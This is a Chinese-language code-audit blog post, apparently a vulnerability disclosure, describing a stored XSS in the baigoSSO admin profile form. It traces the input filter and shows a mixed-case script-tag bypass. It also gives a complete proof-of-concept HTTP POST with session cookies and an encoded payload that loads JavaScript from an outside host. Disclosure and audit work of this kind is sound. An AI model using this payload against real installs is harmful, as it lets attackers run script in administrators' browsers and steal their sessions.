admin

代码审计——baigoSSO
储存型xssRequest URL: `http://ad.com/public/console/profile/...
扫描右侧二维码阅读全文
10
2019/10

代码审计——baigoSSO

储存型xss

Request URL: `http://ad.com/public/console/profile/info-submit/?1570707122907at0.10176576137213678
`
参数:admin_nick

文件位置 app/ctrl/console/profile.ctrl.php :
函数 infoSubmit line 70对输入到参数进行了过滤


继续跟进

因为传入进来的参数是数组所以会进入到352行的fillParam方法内

最后进入到670行的input方法

在826行进入到safe函数对输入到内容进行过滤

对输入到xss内容进行了过滤
但是我们可以通过输入payload:

<sCRiPt/SrC=//js地址>

绕过了此处的过滤

poc:

POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa

__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E

更改成功后刷新页面发现执行了我们的xss


Last modification:November 5th, 2019 at 02:54 pm
If you think my article is useful to you, please feel free to appreciate

Leave a Comment